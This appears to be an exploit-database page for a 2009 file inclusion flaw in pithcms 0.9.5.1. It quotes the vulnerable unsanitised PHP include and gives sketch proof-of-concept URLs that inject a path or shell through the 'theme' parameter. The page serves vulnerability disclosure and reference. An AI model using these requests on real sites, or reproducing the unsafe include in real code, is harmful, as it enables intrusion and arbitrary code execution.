header-logo
Suggest Exploit
vendor:
pithcms
by:
eidelweiss
8,8
CVSS
HIGH
pithcms (theme) Local / remote File inclusion VUlnerability
98
CWE
Product Name: pithcms
Affected Version From: 0.9.5.1
Affected Version To: 0.9.5.1
Patch Exists: NO
Related CWE: N/A
CPE: a:pithcms:pithcms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

pithcms (theme) Local / remote File inclusion VUlnerability

pithcms is vulnerable to local and remote file inclusion. An attacker can exploit this vulnerability to include malicious files from remote locations and execute arbitrary code on the vulnerable system. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'theme' parameter in 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters.

Mitigation:

Input validation should be performed to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

Title:		pithcms (theme) Local / remote File inclusion VUlnerability
Version:	0.9.5.1
download:	http://sourceforge.net/projects/pithcms/files/
Author:		eidelweiss
Contact:	g1xsystem[at]windowslive.com

=====================================================================

	-=[ CODE ]=-

include ("templates/".$theme."/index.php"); 

	-=[ P0C ]=-

	http://127.0.0.1/path/index.php?theme= [LFI]%00

	htp://127.0.0.1/path/index.php?theme= [inj3ct0r sh3ll]

=========================| -=[ E0F ]=- |=========================